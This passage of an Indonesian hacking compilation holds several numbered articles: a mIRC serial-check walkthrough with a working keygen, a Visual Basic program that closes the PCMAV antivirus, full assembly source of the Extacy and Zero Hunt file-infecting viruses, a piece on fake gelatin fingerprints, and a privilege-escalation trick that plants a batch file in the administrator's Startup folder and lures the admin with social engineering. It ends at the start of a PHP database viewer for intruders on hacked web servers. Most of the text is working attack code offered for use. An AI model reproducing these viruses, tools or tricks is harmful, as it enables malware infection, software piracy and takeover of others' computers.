yang kita masukkan tadi. Push ebx ;masukkan nilai ebx ke stack Mov byte ptr [esi],00 ;ganti karakter “-“ dengan null byte Call 00570543 ;rutin ini akan menyimpan serial pertama kita Add esp,04 Mov byte ptr [esi],2d ;kembalikan karakter “-“ Inc esi ;esi+1 Mov ebp,eax Cmp byte ptr [esi],00 ;apakah ESI sudah menunjuk pada akhir serial? Je 004c7525 ;jika ya lompat ke 004c7525 Psuh esi ;masukkan nilai ESI ke stack Call 00570543 ; gak penting Mov ecx, edi ;EDI berisi nama kita Add esp,04 Mov [esp+10],eax Lea edx,[ecx+01] Mov al,[ecx] ;masukkan 1 karakter dari nama kita ke AL Inc ecx ; ecx=ecx+1 Test al,al ;apakah al = 0 Jne 004c7570 ;jika tidak loop! Sub ecx, edx ;ECX kurangi EDX, hasilnya ECX berisi jumlah karakter dari nama kita Mov esi,00000003 ;esi=3 Xor edx,edx ;kosongkan EDX Xor ebx,ebx ;kosongkan EBX Cmp ecx,esi ;apakah jumlah karakter nama kita - Jle 004c75a8 ;kurang atau sama dengan 3 ? (len(nama) <= 3) jika ya lompat! Karena jumlah karakter nama kita lebih dari 3 maka nggak akan terjadi lompatan ini. Trace terus (ingat pake F7 jangan pake F8), pada jmp 004c7590 kita akan melompat

pendek, Setelah lompat kita mendarat pada kode berikut: Movzx eax,byte ptr [esi+edi] ;masukkan 1 karakter pada EAX Imul eax, [esp+edx*4+14] ;kalikan EAX dengan.... (mungkinkah array?), coba kita tengok

alamat ESP, apakah ada nilai ajaib disitu?, caranya klik kanan pada kolom sebelah bawah dan pilih “Goto address”, ketik “esp+edx*4+14” (gak pake kutip) tekan enter.

JRENG!!!

He..he..he..., ternyata dugaanku benar lihat pada gambar diatas, itu adalah array! Yang

berisi nomor ajaib, nah!, sekarang kita butuh kalkulatornya Bill untuk meng-convert nilai heksadesimal ke nilai desimal, (Bill pinjem kalulatornya dong!), pada kalkulator klik Menu “View>Scientific”, pilih radio button “Hex”, masukkan nilai ajaib dan pindah radio button-nya ke “Dec” maka kita dapat mengetahui nilai desimalnya:

Konvertasi nilai hex ke dec pada array diatas adalah:

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 HEXADECIMAL : 0B 06 11 0C 0C 0E 05 0C 10 0A 0B 06 0E 0E 04 0B 06 0E 0E 04 DECIMAL : 11 6 17 12 12 14 5 12 16 10 11 6 14 14 4 11 6 14 14 4 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39

HEXADECIMAL : 0B 09 0C 0B 0A 08 0A 0A 10 08 04 06 0A 0C 10 08 0A 04 10 DECIMAL : 11 9 12 11 10 8 10 10 16 8 4 6 10 12 16 08 10 4 16

Ternyata nomor ajaib itu ada 39 buah terangkum dalam tabel array. Jadi perintah Imul eax, [esp+edx*4+14] sama dengan perintah pada VB : Asc(Mid$(ESI,X,1)) * NomorAjaib(EDX) He..he..he.. Algoritma yang sederhana bukan?, oke, makan dulu coklatnya ah... Sampai sini saya sudah melihat titik terang. Lanjut! Add ebx,eax ;tambah EBX dengan nilai hasil pengalian pada EAX Inc edx ;EDX ini adalah counter cmp edx,26 ;apakah sudah berputar sebanyak 38 kali? (kok 38 bukan 39?, ya karena

array pertama dibaca mulai dari 0) jle 004c75a3 ;jika kurang atau sama dengan 38 lompat! Xor edx,edx ;tapi jika udah lebih dari 38 set EDX jadi 0 (balik ke nomor ajaib pertama) Inc esi ;tambah esi dengan 1 (karakter selanjutnya) Cmp esi,ecx ;apakah karakter udah habis? Jnge 004c7590 ;jika belum balik lagi (loop! Sampe karakter habis) Nah sampe sini pasti kita sudah paham maksud kode diatas, jadi ilustrasinya kira-kira

begini: Nama -> pisahkan serial jadi dua bagian dengan format 00000-00000 -> kalkulasikan

bagian pertama -> kalkulasikan bagian kedua-> samakan nomor serial yang kita masukkan dengan hasil kalkulasi pada EBX -> kesimpulan (valid/invalid code).

nah sekarang kita buat key generatornya, mau dibuat pake apa? Tenang jangan panik

dulu aku gak akan buat pake Assembly kok, kita buat pake VB aja yang mudah. Yup!, kita mulai aja.

Siapkan satu buah TextBox dan satu CommandButton lalu ketikan source code berikut : -------------------[CUT HERE]------------------------------------------------- Option Explicit Private Sub Command1_Click() Dim NomorAjaib(38) As Long Dim EDX, EAX As Long Dim Bagian1, Bagian2 As Long Dim X As Long „nomor-nomor ajaib kita isikan kedalam array NomorAjaib(0) = 11: NomorAjaib(1) = 6: NomorAjaib(2) = 17: NomorAjaib(3) = 12 NomorAjaib(4) = 12: NomorAjaib(5) = 14: NomorAjaib(6) = 5: NomorAjaib(7) = 12 NomorAjaib(8) = 16: NomorAjaib(9) = 10: NomorAjaib(10) = 11: NomorAjaib(11) = 6 NomorAjaib(12) = 14: NomorAjaib(13) = 14: NomorAjaib(14) = 4: NomorAjaib(15) = 11 NomorAjaib(16) = 6: NomorAjaib(17) = 14: NomorAjaib(18) = 14: NomorAjaib(19) = 4 NomorAjaib(20) = 11: NomorAjaib(21) = 9: NomorAjaib(22) = 12: NomorAjaib(23) = 11 NomorAjaib(24) = 10: NomorAjaib(25) = 8: NomorAjaib(26) = 10: NomorAjaib(27) = 10 NomorAjaib(28) = 16: NomorAjaib(29) = 8: NomorAjaib(30) = 4: NomorAjaib(31) = 6 NomorAjaib(32) = 10: NomorAjaib(33) = 12: NomorAjaib(34) = 16: NomorAjaib(35) = 8 NomorAjaib(36) = 10: NomorAjaib(37) = 4:

NomorAjaib(38) = 16 'jumlah karakter nama minimal 4 karakter If Len(Text1.Text) < 4 Then MsgBox "Nama minimal 4 karakter!" Text1.SetFocus Exit Sub End If EDX = 0 'xor edx,edx 'buat nomor serial untuk bagian pertama dulu For X = 4 To Len(Text1.Text) EAX = Asc(Mid$(Text1.Text, X, 1)) * NomorAjaib(EDX) Bagian1 = Bagian1 + EAX EDX = EDX + 1 If EDX > 38 Then EDX = 0 Next X EDX = 0 EAX = 0 'buat nomor serial bagian kedua For X = 4 To Len(Text1.Text) EAX = Asc(Mid$(Text1.Text, X - 1, 1)) * Asc(Mid$(Text1.Text, X, 1)) Bagian2 = Bagian2 + EAX * NomorAjaib(EDX) EDX = EDX + 1 If EDX > 38 Then EDX = 0 Next X 'hasil kalkulasi tampilkan pada msgbox MsgBox "Nomor serial loe : " & Trim$(Str$(Bagian1)) & "-" & Trim$(Str$(Bagian2)), ,

"mIRC 6.16 KEYGEN" End Sub -------------------[EOF]------------------------------------------------- Setelah dikompil coba jalankan dan masukkan nama, setelah itu masukkan nama dan

nomor serial pada jendela “Registration” mIRC, Klik “OK” dan...

Huaaahm…. Jam sudah menunjukkan pukul 3.30, akhirnya selesai juga nih artikel. Dengan cara beginilah saya bisa mengetahui algoritma sistem proteksi pada suatu

aplikasi/software tanpa perlu mengintip/meminta source code pada sang developer!.

18. Antivirus PCMAV LEMAH HACK

Pada bulan Maret ini Majalah PC Media telah membuat program AntiVirus bernama PCMAV dengan jaminan kepuasan 100% untuk dapat mengatasi Brontok dan variannya secara akurat dan tuntas baik di memory, registry, file dan folder yang tersebunyi. Apakah anda sudah mempunyainya ? Antivirus tersebut menurut saya terlalu digembor-gemborkan seperti tanpa kelemahan sama sekali. Oke, dengan pengalaman saya selama 13 bulan sebagai programmer (bukan 13 tahun Bo). Saya akan tunjukkan kelemahannya. Kita akan buat suatu program di Visual Basic 6 yang akan membuat program AntiVirus tersebut bertekuk lutut. Selama program ini bekerja, program antivirus tersebut tidak akan bisa bekerja. Program ini hanya memerlukan 1 buah form tanpa file modul. Kontrol yang diperlukan hanya 1 buah tombol bercaption Run , dan 1 buah timer berinterval 1000 dan enablednya diset False. Kode yang dimasukkan adalah sebagai berikut :

Adapun keterangan dari kode diatas adalah sebagai berikut : Saat anda menekan tombol Run maka timer akan bekerja dan captionnya akan berubah menjadi “Stop”. Dalam prosedur Timer dicari nilai handle window yang nama kelasnya TMainForm (program antivirus tersebut dibuat dengan Delphi sehingga nama kelas Windownya TMainForm), setelah di dapatkan nilai handle-nya (dalam variable x) maka program tersebut akan dimatikan dengan fungsi Windows API SendMessage. Kode diatas juga bisa digunakan untuk mematikan semua program yang dibuat dengan Delphi. Jika ingin lebih spesifik maka kita harus memasukkan nilai captionnya pada fungsi FindWindow. Untuk program antivirus PC Media caption programnya adalah PCMAV,

sehingga yang dimasukkan dalam fungsi FindWindow adalah : x = FindWindow("TMainForm", “PCMAV”) Jadi selama nama kelasnya TMainForm dan Captionnya PCMAV maka program antivirus tersebut dijamin dalam 5 detik akan langsung dimatikan. Saran saya tuk pengembang

software antivirus sebaiknya gunakan program C, entah Visual C atau yang sejenisnya, karena nama kelasnya dapat dengan mudah diatur sehingga dapat menghindar dari prosedur yang saya sampaikan ini, dan yang kedua hindari penggunaan nilai caption yang tetap, kalo perlu ikat dengan timer sehingga nilainya berubah-rubah sepanjang waktu. Kayaknya gitu aja deh yang saya bisa sampaikan tentang satu kelemahan dari Antivirus buatan Lokal supaya cepat diperbaiki developernya dan pelajaran bagi programmer antivirus lainnya.

Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long Private Declare Function SendMessage Lib "user32" Alias "SendMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, lParam As Any) As Long Private Const WM_CLOSE = &H10 Dim x as Long Private Sub Command1_Click() If Command1.Caption = "Run" Then Timer1.Enabled = True Command1.Caption = "Stop" Else Timer1.Enabled = False Command1.Caption = "Run" End If End Sub Private Sub Timer1_Timer() If Second(Now) Mod 5 = 0 Then x = FindWindow("TMainForm", vbNullString) SendMessage x, WM_CLOSE, 0, 0 End If End Sub

19. Virus Assembly

Bagi yang ingin mempelajari bagaimana membuat virus ataupun antivirus, pada kesempatan kali ini di bagikan source code virus Extacy dan Zero Hunt. Setidaknya sebagian ilmu dan teknik dapat diambil dari ke2 virus di bawah ini.

Virus Extacy ------------------------------------------------------------------------

.model tiny .code .radix 16 .code viruslength = heap - _small startload = 90 * 4 _small: call relative oldheader dw 020cdh dw 0bh dup (0) relative: pop bp push ds push es xor ax,ax mov ds,ax mov es,ax mov di,startload cmp word ptr ds:[di+25],di jz exit_small lea si,[bp-3] mov cx,viruslength db 2Eh rep movsb mov di,offset old21 + startload mov si,21*4 push si movsw movsw pop di mov ax,offset int21 + startload stosw xchg ax,cx stosw exit_small: pop es pop ds or sp,sp jnp returnCOM returnGNU: returnCOM: mov di,100 push di mov si,bp movsw movsb ret infect: push ax push bx

push cx push dx push si push di push ds push es mov ax,3d02 int 21 xchg ax,bx push cs pop ds push cs pop es mov ax,5700h int 21h push cx push dx mov si,offset oldheader+startload mov ah,3f mov cx,18 push cx mov dx,si int 21 cmp ax,cx jnz go_already_infected mov di,offset target + startload push di rep movsb pop di mov ax,4202 cwd int 21 cmp ds:[di],'ZM' jz infectNOT cmp ds:[di],'MZ' jz infectNOT sub ax,3 mov byte ptr ds:[di],0e9 mov ds:[di+1],ax sub ax,viruslength cmp ds:[si-17],ax jnz finishinfect go_already_infected: pop cx jmp short already_infected db "EXTASY!" db "(c) Metal Militia / Immortal Riot" int21: cmp ax,4b00 jz kewl cmp ax,3e00 jnz oops mov ah,45 int 21 jmp kewl oops: jmp chain infectNOT: jmp go_already_infected

kewl: jmp infect finishinfect: mov cx,viruslength mov dx,startload mov ah,40 int 21 mov ax,4200 xor cx,cx cwd int 21 mov ah,40 mov dx,di pop cx int 21 already_infected: pop dx pop cx mov ax,5701h int 21h mov ah,3e int 21 exitinfect: pop es pop ds pop di pop si pop dx pop cx pop bx pop ax chain: db 0ea heap: old21 dw ?, ? target dw 0ch dup (?) endheap: end _small Virus Zero Hunt-------------------------------------------------------------------- CSEG SEGMENT ASSUME CS:CSEG, ES:CSEG, SS:CSEG org 100h ; Zerohunt virus ; Disassembly by PRiEST ; 4-15-93 CMC_JMP equ 0e9f5h ;This is the virus's signature ;which is located at the beginning ;of infected files, it consist of ;a CMC and a JMP Mem_Loc equ 21ch ;offset of virus in memory Zero_Size equ offset Zero_End-offset Zero_Start ;Size of virus Zero_File_Size equ offset Zero_File_End-offset Zero_Start ;Size of virus in ;file IVT_21 equ 21h*4h ;offset of Int 21h in IVT

IVT_24 equ 24h*4h ;offset of Int 24h in IVT Mem_Size equ 413h ;offset of Memory size in BIOS area Zerohunt: jmp Zero_Start ;Dummy code nop org 21ch ;set new origin Zero_Start: call $+3 ;Push IP pop si ;pop IP into SI mov es,ax ;ES = segemnt zero mov di,Mem_Loc ;Offset of memory resident code cmp byte ptr es:[di],0e8h ;This instructions checks to see ;if the virus is already in memory ;by looking for the call at ;Zero_Start in the IVT je Jump_File ;return control to file if in memory mov cx,Zero_Size ;size of virus sub si,3h ;Find offset of Zero_Start rep movsb ;copy us to IVT push es pop ds ;DS = 0 mov bx,IVT_21 ;offset of Interrupt 21 in the IVT les si,ds:[bx] ;Get seg:off of Int 21h mov word ptr ds:[bx],offset Zero_21 ;Point Int 21h to us mov word ptr ds:[bx+2h],ax ;point Int 21h to segment 0 mov word ptr ds:[Old_21+2h],es ;Save Int 21h mov word ptr ds:[Old_21],si ;Save Int 21h mov al,40h ;40h k mov bx,ds:[Mem_Size] ;Get amount of memory in k's sub bx,ax ;subtract 40h to get segment of mem mul bx ;find address of free memory mov word ptr ds:[High_Mem],ax ;Save segment address xor ax,ax ;Zero out AX Jump_File: push cs push cs pop ds ;Restore DS and ES pop es ;Self-modifying code that restores the first 4 bytes of an infected .com ;file. The Jump_Data defines where to jump when the virus is done, this ;is because it only infects files that have a JMP (0e9h) as the first ;instruction, any other file gets ignored. db 0c7h,6,0,1 ;mov word ptr ds:[100h], File_Data dw 20cdh ;quit to DOS db 0c7h,6,2,1 ;mov word ptr ds:[102h], File_Data_2 dw 9090h ;NOPs db 0e9h ;Jump ;This is where the infected program originally jumped to, right now it's ;set back to the beginning so that it will terminate to DOS. Jump_Data dw 0-(offset Jump_Data_End-offset Zero_Start) Jump_Data_End: ;used to find offset of Zero_Start Random_Read: pushf ;Keep stack in order when IRET push cs ;return to this segment call Jump_21 ;Call DOS to read file pushf push ax push es push bx push ds ;save registers mov ah,2fh ;Get address of DTA into ES:BX int 21h push es

pop ds ;DTA segment in DS cmp word ptr ds:[bx],CMC_JMP ;Is this file infected? jne Skip_Block_Clean call Stealth ;Hide virus Skip_Block_Clean:pop ds pop bx pop es pop ax ;Pop registers jmp Fix_Flags_Ret ;Fix flags and return Handle_Read: pushf ;Keep stack right push cs ;return to this segment call Jump_21 pushf ;Save flags jb Fix_Flags_Ret xchg dx,bx ;Address of data read into BX cmp word ptr ds:[bx],CMC_JMP ;File infected? jne Fix_Flags_DX cmp word ptr ds:[bx+2h],ax ;is it valid (? I guess) jnb Fix_Flags_DX call Stealth ;Hide virus Fix_Flags_DX: xchg dx,bx ;restore registers Fix_Flags_Ret: popf ;POP flags push bp push ax ;Save registers pushf pop ax ;tranfer flags to ax mov bp,sp ;get stack frame mov ss:[bp+8h],ax ;Save flags directly into stack pop ax pop bp ;POP registers iret Stealth: push si ;Save register mov si,bx ;Where code was read to add si,ds:[bx+2h] ;Where virus is in program push word ptr ds:[si+File_Data-Zero_Start] ;original bytes pop word ptr ds:[bx] ;restore them push word ptr ds:[si+File_Data_2-Zero_Start] ;original bytes pop word ptr ds:[bx+2h] ;restore them too add si,4h ;fix for jump push ax push cx ;save registers mov cx,Zero_Size ;Size of virus xor al,al ;Zero out AL Stealth_Loop: mov byte ptr ds:[si],al ;Remove virus from file inc si loop Stealth_Loop pop cx pop ax pop si ;Pop registers retn Zero_21: cmp ah,21h ;Random read? je Random_Read cmp ah,27h ;Random Block read? je Random_Read cmp ah,3fh ;Handle read? je Handle_Read cmp ax,4b00h ;Execute program? je Infect

jmp Jump_21 ;Jump to original Int 21h Infect: push es ;save registers push ax push bx push dx push ds mov ax,3d02h ;open file for writing int 21h xchg ax,bx ;handle into BX mov ah,3fh ;read from file xor cx,cx ;Zero CX mov ds,cx ;zero into DS inc cx ;read one byte mov dx,offset Buffer ;read to variable "buffer" mov si,dx ;same into SI pushf ;Keep stack straight after IRET push cs ;Push CS for Far return call Jump_21 ;Call original Interrupt 21 cmp byte ptr ds:[si],0e9h ;Is the first instruction a jump? je File_Has_Jump jmp Close_File ;File is not valid, close and quit File_Has_Jump: mov ax,4200h ;Set position from start of file dec cx ;CX now equals 0 xor dx,dx ;DX also equals 0 int 21h ;set file position to start of file pop ds pop dx ;POP location of file name push dx push ds ;PUSH them back push bx ;Save file handle number push cs pop es ;Set ES to our CS mov bx,offset High_Mem ;offset of variable High_Mem mov ax,4b03h ;Load file int 21h mov ds,es:[bx] ;Get address of High memory mov cx,Zero_File_Size ;size of virus in File mov dx,cx ;same into DX mov bx,ds:[1h] ;Get jump address mov bp,bx ;I don't recall BP being saved!!! xor al,al ;zero out AL Search_Loop: dec bx ;decrement pointer pop di ;Pop handle je Close_File_DI push di ;Save handle again cmp byte ptr ds:[bx],al ;search for zeros je Search_Looper mov cx,dx ;reset counter Search_Looper: loop Search_Loop ;Scan for size of virus mov di,bp ;Get jump address of file sub di,bx ;minus location of zeros sub di,offset Jump_Data_End-offset Zero_Start ;Make jump mov word ptr cs:[Jump_Data],di ;Save original jump address push word ptr ds:[0] ;save original bytes pop word ptr cs:[File_Data] ;Into our own code push word ptr ds:[2h] ;again with bytes 3 and 4 pop word ptr cs:[File_Data_2] mov si,Mem_Loc ;location of virus in memory mov cx,dx ;Size of virus in file dec cx ;Size of virus

push ds pop es ;ES = segment of free memory push cs pop ds ;DS = our segment mov di,bx ;offset of free space in file rep movsb ;copy virus into file (I gather) sub bx,4h ;subtract for jump to virus mov word ptr es:[2h],bx ;Fix jump mov word ptr es:[0],CMC_JMP ;CMC, then JMP mov di,0cfcfh lds si,ds:[IVT_24] ;fetch address of Int 24h xchg di,ds:[si] ;what the hey!? Computer should ;crash if Int 24h is triggered! pop bx ;POP handle number mov ax,5700h ;Get date int 21h push cx push dx ;save original date/time of file push es pop ds ;DS = segment of free memory mov ah,40h mov cx,bp ;size of virus xor dx,dx int 21h ;write to file, I guess the virus pop dx pop cx ;POP the date/time mov ax,5701h ;restore date/time to file int 21h xchg di,bx ;dummy exchange if infection ok Close_File_DI: xchg di,bx ;retore handle from DI for closing Close_File: mov ah,3eh ;close file int 21h lds si,cs:[IVT_24] ;Get Int 24h address from IVT cmp byte ptr ds:[si],0cfh ;Is it to us? jne No_24_Restore ;I know, they're Shitty labels xchg di,ds:[si] ;restore Int 24h No_24_Restore: pop ds pop dx pop bx pop ax pop es ;Pop all registers Jump_21: db 0eah ;jmp seg:off Old_21 dd ? ;segment offset of Int 21h Buffer db ? Zero_End: High_Mem dw ? ;Segment of availible memory Zero_File_End: CSEG ENDS END Zerohunt

20. Hack Alat Sidik Jari Perkembangan penggunaan alat-alat biometrik untuk alasan keamanan berkembang dengan cepat. Di Indonesia sendiri dapat kita lihat implementasi penggunaan alat biometrik sudah digunakan di perusahaan seperti penyedia layanan safety box, perusahaan farmasi, perusahaan yang memerlukan security atau keamanan sehingga tidak sembarangan orang bisa masuk ke ruangan atau ke dalam perusahaan. Di artikel ini akan kita lihat bahwa ternyata alat biometrik dengan memanfaatkan fingerprint atau sidik jari ternyata bisa diakali dengan sangat mudah sekali.

Alat biometrik sebagaimana kita ketahui merupakan peralatan tambahan yang digunakan dengan tujuan menambah tingkat security atau keamanan di suatu wilayah atau tempat. Ada alat yang berdasarkan identifikasi dari sidik jari / fingerprint, dari bentuk wajah, lekuk di tangan, selaput pelangi mata (iris), retina mata, suara dan tanda tangan. Dan yang umum digunakan di Indonesia adalah mode alat biometrik yang menggunakan sidik jari. Penggunaan alat atau teknologi biometrik ini merupakan bagian dari proses autentikasi yaitu mengidentifikasikan pengakses / siapa yang akses ?. Selama ini para ahli security terutama dari para perusahaan yang menciptakan atau membuat produk bimetrik sidik jari ini mengatakan bahwa untuk mengakali alat ini merupakan hal yang mustahil atau tidak mungkin terjadi dengan alasan sidik jari merupakan unik artinya semua orang mempunyai sidik jari yang berbeda dan tidak mungkin bisa sama persis. Alasan para ahli security tersebut memang benar. Namun bagaimana kalau seandainya orang yang punya jari tersebut dipotong ? kemudian dibawa ke tempat mesin biometrik sidik jari tersebut ? Atau orangnya sendiri ditodong kemudian disuruh untuk mengautentikasikan sendiri ke mesin tersebut ? Namun yang dilakukan oleh seorang profesor matematika adalah sangat sederhana sekali untuk mengakali mesin biometrik sidik jari ini. Apa yang dilakukannya dan menjadi berita utama di beberapa media Barat adalah 'Gummi bears defeat fingerprint sensors'. Profesor matematika dari Jepang ini, Tsutomu Matsumoto menggunakan gelatin (gel atau agar-agar) dan cetakan plastik untuk menghasilkan 'gummi' yang berbentuk jari dengan sidik jarinya ada di gummi tersebut. Dan perbuatannya ini dapat mengakali 11 sistem autentikasi sidik jari dengan tingkat keberhasilan berhasil 4 kali dari 5 kali usaha atau sekitar 80% tingkat keberhasilan. Dengan proses yang dilakukan profesor ini kalau ditindak lebih lanjut atau diproses lebih lanjut, sidik jari yang ditinggalkan seseorang di gelas, bisa dipindahkan dan dibuat jari palsu dari bahan jelly. Bahan-bahan yang digunakan oleh profesor Tsutomu ini sangatlah sederhana dan murah. Tidak diperlukan teknologi tingkat tinggi namun hanyalah kecerdasan dan ingin mencoba. Dengan bahan yang tidak lebih dari 10 dolar, dia dapat mengakali peralatan canggih dari optical dengan fitur 'live finger sensor'. Dan uniknya penggunakan jari palsu dari bahan jelly ini bisa digunakan untuk mengakali sensor yang dijaga oleh seorang penjaga hanya dengan menempelkan jari palsu jelly ke jari kita sehingga pada saat menekan jari ke alat sensor tersebut akan tidak terlihat oleh penjaga sekalipun dan sesudahnya bahan tersebut bisa dimakan untuk menghilangkan bukti !!!. Ada moral yang bisa kita ambil dari cerita nyata ini bahwa profesor Tsutomu ini bukan ahli pembuat jari palsu dan dia hanyalah seorang ahli matematika. Dia tidak menggunakan peralatan canggih dan mahal melainkan hanyalah bahan agar-agar dan plastik saja yang bisa kita dapatkan di rumah namun berhasil mengakali 11 jenis peralatan sensor sidik jari canggih. Dengan cara sederhana ini saja bisa mengakali sistem canggih ini berarti para profesosional lainnya di luar sana bisa melakukan lebih dari itu. Ini membuktikan juga bahwa security bukanlah hanya semata teknologi saja melainkan suatu perjalanan dan ini sudah diakui oleh Microsoft sendiri dengan slogan mereka yaitu "Security is a journey not a destination".

21. Admin hack Anda sering kesal karena tidak bisa masuk ke control panel ? Tidak bisa install program baru karena system anda diproteksi oleh admin ? Justru kekesalan itulah yang memberikan dorongan kreatifitas untuk mendapatkan ide meningkatkan permission userid yang kita gunakan. Pada artikel ini ditunjukkan bagaimana trik menjadi administrator hanya dengan beberapa langkah sederhana. Perpaduan teknik hacking, yaitu membuat batch file dan social engineering (kalo diterjemahkan dalam bahasa sehari-hari artinya “NEPU”) Cek terlebih dahulu permission (group user) anda: Langkah yang perlu dilakukan adalah sbb: Start > Run > CMD , gue ketik deh ; net user

Hasilnya:

C:\Documents and Settings\RISKI>net use User accounts for \\UNKNOWN ------------------------------------------------------------------------------- __vmware_user__ Administrator Guest HelpAssistant RISKI SUPPORT_388945a0 The command completed successfully.

Aha! ternyata account gue udah di daftarin di local acount sama admin gue nih, jadi waktu gue login domain di PC ini sudah terdaftar juga di local account, entah PANGKAT apa yang admin kasih ke gue, sebaiknya gue cek dulu deh pake net user, Start > Run > CMD, gue ketik lagi; net user RISKI

C:\Documents and Settings\RISKI>net user riski User name RISKI Full Name Comment User's comment Country code 000 (System Default) Account active Yes Account expires Never Password last set 6/21/2005 9:12 AM Password expires Never Password changeable 6/21/2005 9:12 AM Password required Yes User may change password Yes Workstations allowed All Logon script User profile Home directory Last logon 8/19/2005 10:10 PM Logon hours allowed All Local Group Memberships *Power User Global Group memberships *None The command completed successfully.

Ternyata bener dugaan gue, si admin cuma ngasih gue PANGKAT Power User, yang udah pasti punya hak yang sangat terbatas dan minim, terutama buat gue lah! ? sampe sampe gue gak bisa nginstal program2 kesayangan gue ? hemm…. Tunggu aja luh admin brengsek dan pelit, tunggu aja tanggal mainnya! He..he..h.e……

Setelah cek & ricek ternyata Win2000 telah di instal sang admin dengan File System FAT32, huh dasar males mungkin dia formatnya pake Disk Manager kali yak! Yang partisi dan formatnya sekaligus dan lebih cepet tapi sayangnya gak bisa ngasih file system NTFS yang sebenarnya encrytpsi datanya jauh lebih bagus dari pada FAT32, kenapa gue bilang begitu? salah satu contohnya adalah dalam FAT32 seluruh user yang login pada OS tersebut dapat mengakses setiap profile yang ada di bawah direktori document and settings termasuk seluruh direktory pada profile sang ADMINISTRATOR ? aha.. lubang kecil yang amat bagus untuk di exploitasi bukan? Bah bagaimna pula diexploitasinya nih?...

Oke sekarang kita akan mencoba membuat account yang kita punya menjadi account Maha Dewa ? yaitu administrator dengan memanfaatkan celah kecil yang ada,

1. Pertama kita buat batch file untuk mendaftarkan local account kita untuk dijadikan account Maha Dewa yaitu ADMINISTRATOR alias sang pengatus semuanya gitu loh!

Kita gunakan command net localgroup, perhatikan batch file di bawah ini

----------------------------------start------------------------------ @echo off net localgroup Administrators RISKI /add exit ----------------------------------end-----------------------------

ketikkan script tersebut di notepad lalu save as dengan nama admin.bat

2. Yang kedua ini adalah bagian yang paling penting yaitu menaruh file ini agar di exekusi oleh sang admin, karena perintah ini dapat berjalan dengan sempurna hanya oleh sang dewa, tenaaanggg!!! Sebentar lagi kita akan mempunya POWER yang sama dengan si doi sang Admin yang PeLiT he..h.e…he…he.. Karena kita di izinkan untuk menjelajah kemana saja pada file system ini, maka sisipkan admin.bat pada direktori startUp administrator pada alamat berikut ; C:\Documents and Settings\Administrator\Start Menu\Programs\Startup Nah betul sekali dugaan anak gaul sekalian, jadi program itu akan segera di eksekusi secara otomatis begitu sang admin login dengan accountnya, maka seketika itu account RISKI yang cuma punya pangkat Power User maka pada saat itu juga RISKI sekaligus mempunya 2 pangkat, yaitu Power User dan Adminsitrators he…he…. Ketika kita menjadi sang Maha Dewa, you know what should you do next! ?

FYI, jika kita belum terdaftar pada local account (ketika kita cek dengan net user ternyata tidak ada user name kita waktu login) maka script batch filenya kita rubah sedikit dengan tambahan mendaftarkan username kita kedalam local account, baru setelah itu bisa kita naikkan pangkatnya menjadi Administrators, modifikasinya adalah sebagai berikut:

-----------------------------------start--------------------------------- @echo off net user user_name_kamu /add net localgroup Administrator user_name_kamu /add exit ------------------------------------end---------------------------------

Nah setelah semuanya siap lakukan lah hal yang telah di jelaskan pada langkah kedua, maka kita hanya cuma menunggu sang admin login dengan account adminsitratornya, (waduh kapan nih si doi login dan kemakan perangkap gue?.... bisa botak nih nunggunya!) saran gue sih cuma 1 do it the Social Engineering dwonk!! Masak gitu aja bingung? Pancing si admin

supaya dia login di profile adminya, sepengalaman gue sih kalo kita ada kerusakan atau masalah kecil si IT Helpdesk login admin dulu untuk ngecek segala sesuatunya, maklum kalo login di user biasa serba terbatas hi…hi…hi..hi… jadi dari modal pengalam gue mudah mudahan muncul ide ide social engineering yang lebih oke biar si admin kena jebakan kita… dan kalo udah berhasil jangan melakukan hal2 yang destruktif dan merugikan orang lain yang instal AAtolls buat scaning PC si admin wakakakkakak…… atau instal Trojan Client di situ yang nanti servernya di kirim via network atau email ke admin! Duh berdosalah aku kalo gitu yang turut membantu niat jelekmu!

“Merusak pekerjaan banyak orang, memperbaiki pekerjaan segelintir orang, mudah -mudahan komunitas ini menjadi segelintir orang itu, amieenn….”

Artikel ringan ini cuma buat para newbies aja yang kesel sama tindakan admin yang semena mena dan tidak adil, setidaknya ada beberapa pelajaran yang dapat di petik walaupun sesederhana apapun, mudahan dapat menjadi pelajaran yang berharaga. Berikut ini pencegahan yang perlu di lakukan: 1. Enkripsi NTFS lebih baik dari pada FAT32 terutama untuk sekurity dan manajemen file. (oh iya!.. walaupun pake NTFS kita bisa manfaatin autoexec.bat lhoo… untuk eksekusi file admin.bat tadi he..he..he… No Perfect System In The World Man!! ) 2. Sebaiknya Proteksi program program administrasi berikut ini; Regedit, MSCONFIG, GPEDIT.MSC, CommandPromt dan semua program administrasi lainnya yang memungkinkan user memicu file2 kurang ajar di exekusi OS secara otomatis, sengaja ataupun tidak di sengaja. 3. Password BIOS, dan set boot sequence hanya dari hardiks saja, ini mencegah user tidak bisa booting dengan device lain, karena banyak program bertebaran untuk mereset password sang mahadewa, salah satu contohnya dengan Offline NT Password Recovery. (kecuali user nekad banged mencopot baterai CMOS dengan membongkar PC, gile usaha banged dah!!!) 4. Untuk sang admin, sering sering di cek donk kalo ke usernya, kalo udah kecolongan cepet2 di turunin lagi tuh pangkatnya, dan yang sering banget kejadian nih buat temen2 gue kalo login admin, DI LOG OUT DONK!!!!!! jangan ditinggal gitu aza!

Saat berhasil menyusup ke sebuah server web, sangat jarang hacker yang berusaha untuk mengintip data apa saja yang ada di databse server (pengalaman saya saat chatting di dalnet). Mungkin disebabkan karena mereka tidak bisa menjalankan phpmyadmin, karena selama ini phpmyadmin yang saya sisipkan ke salah satu situs, tidak pernah berhasil berjalan. Nah... dari hal-hal di atas, akhirnya saya menulis script php berikut ini -----------------------------------------start di sini----------------------------------------- <small>Database viewer by <b>x`shell a.k.a batam newbie</b></small> <?php $user=""; $pass=""; $db="mysql"; $con = mysql_connect('localhost', $user, $pass); ?> <table border=1><tr> <td valign=top><B>TABEL</B><HR> <?php $result = mysql_list_tables ("$db"); $i = 0; while ($i < mysql_num_rows($result)) { $tb_names[$i] = mysql_tablename ($result, $i); echo $tb_names[$i] . "<BR>"; $i++;

